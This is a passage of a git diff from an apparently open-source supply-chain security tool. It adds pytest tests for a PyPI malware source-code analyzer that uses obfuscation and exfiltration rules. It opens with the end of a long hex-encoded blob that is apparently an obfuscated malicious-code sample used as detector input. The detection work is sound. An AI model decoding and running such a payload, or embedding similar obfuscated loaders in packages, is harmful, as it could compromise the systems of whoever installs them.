da6988b39d7b7c7fb9a71004158a4d13756efabc115ac054dd43a4d225298f00aff556a443953d6d545e9b653e55a4b85cedc73c0acfe00ddf4010905ece1a0d4c87bdc3085eaea0a98858b498e279a0bc89d23be320aed2679036a7b6676818a58caedbcc53b7c218cd2e141261778be27eceb241c4de20ec72823fbf6cb08c76fa103d18977c776bf94e7166e6229abb6e3a708a236d1feee225c31ad31f1d78035c7798874c59776e32c9d41b642b1c57b08dae6d645141c3edfbf076e40ea5e93de43919cc210af472e1f4fb2b91dfa0dd0fe0ba2ade18b2c16503c12c5660286f37e4b21a2b914b5c23374108dcf2d7a6dcc910a837777158dd14eb56246ceb362b1c7d5994e7c0317dbda1640643598e74d836c717dfb79224e638eb0e47a58cfd0f22bd3199af6eb2d61bc291ea63b6dde163677077666b9d886c470f02d5c01fc7f7b302f66f75f3919b370e5cd3c1160b0f46b510ff50c5f00977b139c3f856a5bffe299b3c70ae51065aa995d168a5b9a8af15d3b17ef6963cdf40df74148d104543d272caccf0315349608aab8611a7a7531f84ed2c7cd7554eae9dece619e12f6612e0b1c7276d2e908dd6b98ee3b8e968d0740d813d3e56b248b92fcc8e0cdf55f8b943fba22808e07b0d963a8094f345bd079a7b31f2c10acd1d5662912a91577ec3fb628eab0e5782161bff1081e38ad395108c38577d0c9aec1034ddf9eae3652caf37f084fcdb4f5a79c86c12ebb4519979049c091923f3879d490484bba521d9449d88635a0a103e4641e0a1b9880d89f169d7f5124bd8698a3eb12b542ededb0066f9649762bf10947d91e48f9f9c1869838c91bb5f31a6bb4fe424ed188c5d3c71843df21dad58a7a8948b0e08c416bdfa3531a350dc86c99aafa4bbf5c5e327e0e3ce8b321b246d8a74fe116fe7153a008d589c30f515c1d56ae7160cb5fec12d6fc43a35042cda84476ebbc58a715fc2ba5acf5d83c87983275d599b62b3c53a8564dd8cead39708a9d20547a8e9e36da481d93376334c6aab5bdbbafd355d9de4cfa78232a40bed92c33dcc233b46389c8f2e7460ef40a25166e694c78063ec65fefb7a4f2aec0aca5dece9a9aeec4adff1898ea8d54bac33b4de49af7a18d6c1639d09191286e5b274d5accb3551080579b9e025fd711576206c97af57dcd23bee8917d63126d7e13a1de10855751093ba3dc57d11745f89cbbba1575ff152ae9b203e4c135e4b8ce74a148fe4a5479ae336774d408f1fa7750cb8f6080c54f89f4998d0415ae86d162fcdf0f7bdd1bba69e57a53dbd0aec906fbcd2b520ad9fcda142f5edf6253c744812ddce881928553575ea8226ecaa5d73a5dbe7bb6bba62c7a4e645549886e849b427a708338f1d3bced6a966355483e0763b
c5db4e9fb649204bacab2aed098a4b3566de1dedf4cc7f73d7ab0af4d5ebb96afab396511d324eea897cbc19a28098a72a486c26687426518f462d0113da3d6e4e0c3d115688ea187fb2f7386a170fb6b977b773c5eec1f74220fcdc3530a84d47bcfe114bb22633c6cdcb68ff6496f6a346da4d94aa8cd9faf67ab0f2dde4be919717bceee2d0ebe20e4fd4afeac38af44437d2f8575971afd1340df0668493c0321dfa712e85da9fed151740f3dfafdddfcda74021672001c2715ea0b70074408cbe4020ae460782a337392194afa0c54150b5c0f361d695540124d61033a3b0a0f6df07b3796a281663ba0b221d4aeb3d2acd721251e62078ee40851b0dc600171c61b1414ac9d181514ecdb7009935c9a9a4b332cc00c2a8d0818924818f1b1a45782d7a8773c881fe86e862305799300937c391396cd0080b4b1a96c72105c239006a85b354ca2a91e630230bb91aaa9f94873437c60b665e3a91810b7bf258ead56c8ba486344e8213004d66a37627b94b6da2b83b78953300c8e552538ab48b2016c9fc2ee1159509cf78ea3d51babd312a77025e610b63d0cda45205b8590411570b506a8ddcf8a9bc8b8258a589799339ea27f03ab555b59afbb47e0c5b5cd3c675624853b6af401c046242ca326137dec524ce230e2c5554201cd8eb901211a218da0542a0ae301304180a7415684de3538f5d1be1b3157641b55798a491ac07d45ceaadc72e93f5540dcc1c75649ccd17d59ff4dfc7253fdd64c2ec4680449e411049f72f18a2c878f82252589c840630857ce362e1e5472d042f91548710b5a1f023d509ca3cc5381f69239cb2b30ccd3bb8290004c272545e6b24109d630ede16780713217297f031e9d57e58831aebb876651792de73b56681095d4a5f62b640fb83c171e30eb7f4bbacc45efd2e44455cbbceb56ca5d04daef8bcb5b29550fe721f3f84ba296c18843203c019bdf4dad6fcea51a16659ed68c4a0b9e280d73f6a83add64fb5087ae150734a7160af1b8847535c8ed84a4d40077a168d786e85a13528090b1850481682becc00d29771da28c1e6cb8d898d7d02875b3a1156629f4e04a3ae3b48ef9e59b52644fcde101088a409b42376e4f99454444de8557ff1992b415501a7db525a6811e37245d2a27060dfaf1387bc8afd0b654864735c75586af6def5681cd24053188291c672cff4bfd31be5275ae3fdc3d2cbad6e14e054f723922c9b0974e53704b8b1cd080b8ee55657eb9bce3234efe0a6001078ef5db0932cb7ba43c6956967686fb175a8e24619981440a9b5e553668ee004bc6e39506125f6f3e3a0bbdd1997af1dcee9d49a4b093be471296135de8e05c852c2e2e0b0682a4897e5141016648848323a30ca19c60369a758d9c3f3330e944d6c
5eb4b46cc700a8b814499bdaa597df95a6288bad41690a820d37cb2256b53561beaccea1ced827f0b5a5056325f6fd35a9b67ae3b4aeae5d18edc0c30002a1f524f9be194d51de79fdd88ffb91df7014bf33f1206d52e0bc091d66dca8703f9018ed0a6c6c62e3d01a557db33e87f1eac3e60574403e197c39839942cf49c98805c77206a3148a64de60c4c18ea627dc62132f6308aaea109c5fd3610d6aac73332d0213e194bec46c81f60783e3c61d6ee9725989f52e0cdadaf3a3edf333bf729708e21b0202e134ed3a57518088139635c427aa8914b5a8360125915cca4912496c50e530b3200aaa9c4f2132d6d13c595cc7081f10f9f273c51baf41ac410bae5040215948c6d7d58a5e93073fb589b903ddc019fb047eb7d4beacc4be9e0ce3d494c0a9cf93675452d306ba1120109d4b294dcfb0d1ba6486a1255301cc6c495b56b129905c4a4802835c02c518027911266cb1ab899853e8a09f2a65034c41038a4bf9ae8a11b9bd4817ba8d32ca1ab4e00a05149285a02f3380f4458f364ab0f9726362639fc0e196ba9d95d8bb030dfb7dcc8c8a6a1584c03827201049d3aeb199a914090dc01ae2d356829202ceb5b4fccafcb27c96a1148a64de6004dc4a347b278c40b80309b6b6cba8bf8628aaea109c5fc5610d6aac7363f50105e4d426e60e740330466edcef964a979538c493434a5de39955d50b7b7a8ffe1680401c4dbece35ed02da19331c44c2c53df98296d4945ff9280c6f563b4b11040d5a7085020ac94234d71180a508e251cfcfef962288957802455039b33ac85934a1fae55395458431fd0e6bc55512311f665d4995c987fc0c3b67b9796d18944b61c632ac77789c3f0a0231111a0fd07a30e804bb9f85d05a0572cae150ca497360afeb20a07a0614976f195a3712da456a2f654ccfb1d6b406256101030ac94234d40940faca501b25d87cb931b1b14fe0704b73c34a1cf02d030813b637c9bf142eddc68667d3e6550240357e4f7120303f1a53f7946c986788afa79befc329dd610c77e4318705c7d37edbd23c293f774fdd975fd65776697da55e5034aff70eb05ebc19edff0cd1139aa01aa0516615bc081c554ddda4fd178eaff5cbe63846011d763eec47f4a9012a582957d589cbd20c4d04e9758662a4c95ea0d325d70e12ffa9d3e5a7b33a8fcab2c448fbd56d1b62a8d311549a94c46ddb8a098a5b11de4eb8e93ca6f9f3ad22f194d5c0a29dd6b2d80b5a61e966d870688ef10ca7131311d4007e741a8e9f5802ad32a7a32c3b3869e1382686cb077349c418566a11cec979d5e65b76f1fa5576795b3d1f5f760fabdddffb5356bfe679f6ef7cb5ffb17a3b9e56cfdbc361fbfdb0cb7eee4edbd3e9bd6aeebfffde1f4efbb78fcabb5777cfc7d7
5ffbc3eeee7ef5e7f1ad5aba3abeafa0a9c56562b5a42c5f8f2fbf0fbbb2ac56dddde5ab7f3daeeeda997722046fdbd7e1f2968dd5eef0b1bbb092d50130088d6fad22eabf19efe0434ea834f994b5f02f5fdab7afdd927cf3d58b408db81df644919c4780d74d6ece0cd7ed43c777fb12c0abc9a7164b5695c9feab5d3e1883346aecb33a90e16393fc647e9aff1f99b5fed2'.replace("\n" , ""))).decode()) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..3fb423e46 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -0,0 +1,116 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" +import json +import os +from unittest.mock import MagicMock, patch + +import pytest + +from macaron import MACARON_PATH +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer + +RESOURCES_PATH = os.path.join(MACARON_PATH, "resources") + + +def test_no_resources() -> None: + """Test for when the semgrep rules can't be found, so error.""" + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path="") + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_defaults_section(mock_defaults: MagicMock) -> None: + """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" + mock_defaults.has_section.side_effect = lambda _: False + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + 
+@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_custom_path(mock_defaults: MagicMock) -> None: + """Test for when a default path isn't provided, so the custom rule path should be None.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda _: (MagicMock(get=MagicMock(return_value=None))) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: + """Test for when the custom path provided does not exist, so error.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="some_random_path" if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: + """Test for when the provided file is not a valid semgrep rule, so error.""" + # use this file as an invalid semgrep rule as it is most definitely not a semgrep rule, and does exist + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + 
MagicMock(get=MagicMock(return_value=os.path.abspath(__file__) if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +def test_no_sourcecode(pypi_package_json: MagicMock) -> None: + """Test for when there is no source code available, so error.""" + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = "" + + with pytest.raises(HeuristicAnalyzerValueError): + analyzer.analyze(pypi_package_json) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("sourcecode_sample_dir", "rule_file"), + [ + pytest.param("obfuscation", "obfuscation.yaml", id="obfuscation"), + pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), + ], +) +def test_rules( + mock_defaults: MagicMock, pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str +) -> None: + """Test each semgrep rule file against its matching directory of code samples.""" + sample_path = os.path.join( + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir + ) + + with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: + expected_results = json.loads(file.read()) + + # test defaults without custom rule path + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = sample_path + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) + + result, analysis = 
analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + assert expected_results == analysis diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 15caf3249..3910b9579 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -7,10 +7,12 @@ import os import urllib.parse from pathlib import Path +from unittest.mock import MagicMock, patch import pytest from pytest_httpserver import HTTPServer +from macaron import MACARON_PATH from macaron.config.defaults import load_defaults from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.checks.check_result import CheckResultType @@ -22,20 +24,30 @@ RESOURCE_PATH = Path(__file__).parent.joinpath("resources") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected"), + ("purl", "expected", "experimental"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV # knowledge base, it would report the package as malware. However, we intentionally block unit tests # from reaching the network. 
- ("pkg:pypi/zlibxjson", CheckResultType.PASSED), - ("pkg:pypi/test", CheckResultType.UNKNOWN), - ("pkg:maven:test/test", CheckResultType.UNKNOWN), + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, False, id="test_malicious_pypi_package"), + pytest.param("pkg:pypi/test", CheckResultType.UNKNOWN, False, id="test_unknown_pypi_package"), + pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), + # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving + # the issue of this false negative. + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), ], ) def test_detect_malicious_metadata( - httpserver: HTTPServer, tmp_path: Path, macaron_path: Path, purl: str, expected: str + mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + experimental: bool, ) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -44,6 +56,10 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] + if experimental: + ctx.dynamic_data["analyze_source"] = True + + mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") # Set up responses of PyPI endpoints using the httpserver plugin. 
with open(os.path.join(RESOURCE_PATH, "pypi_files", "zlibxjson.html"), encoding="utf8") as page: @@ -129,5 +145,5 @@ def test_evaluations(combination: dict[Heuristics, HeuristicResult]) -> None: confidence, triggered_rules = check.evaluate_heuristic_results(combination) assert confidence == 0 - # Expecting this to be a dictionary, so we can ignore the type problems + # Expecting this to be a dictionary, so we can ignore the type problems. assert len(dict(triggered_rules)) == 0 # type: ignore[arg-type]